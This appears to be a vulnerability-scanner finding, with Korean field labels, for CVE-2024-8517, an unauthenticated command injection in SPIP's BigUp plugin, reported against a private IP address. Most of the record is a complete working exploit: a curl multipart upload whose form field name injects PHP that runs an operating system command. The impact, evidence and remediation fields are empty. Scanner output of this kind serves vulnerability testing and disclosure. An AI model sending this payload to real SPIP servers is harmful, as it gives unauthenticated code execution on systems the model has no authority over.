입력:
제목: SPIP BigUp Plugin - Remote Code Execution
심각도: CRITICAL
카테고리: CVE
엔드포인트: http://10.67.128.251//spip/spip.ph%70
CVE: cve-2024-8517
설명: SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
영향: N/A
증거: 
재현: curl -X 'POST' -d '--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="page"

spip_pass
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="lang"

fr
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="formulaire_action"

oubli
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="formulaire_action_args"

AKXEs4U6r36PZ5LnRZXtHvxQ/ZZYCXnJB2crlmVwgtlVVXwXn/MCLPMydXPZCL/WsMlnvbq2xARLr6toNbdfE/YV7egygXhx
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="formulaire_action_sign"


--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="oubli"

37bZNxbVAMoEIjOdyIM7PauQZml@AuwtI.com
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="nobot"


--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="bigup_retrouver_fichiers"

a
--5f02b65945d644d6a32847ab130e9586
Content-Disposition: form-data; name="RCE['\''.system('\''id'\'').die().'\'']"; filename="mdmih.txt"
Content-Type: text/plain

37bZNxbVAMoEIjOdyIM7PauQZml
--5f02b65945d644d6a32847ab130e9586--
' -H 'Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586' -H 'Host: 10.67.128.251' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15' 'http://10.67.128.251//spip/spip.ph%70?pag%65=spip_pass&lang=fr'
대응/조치 힌트: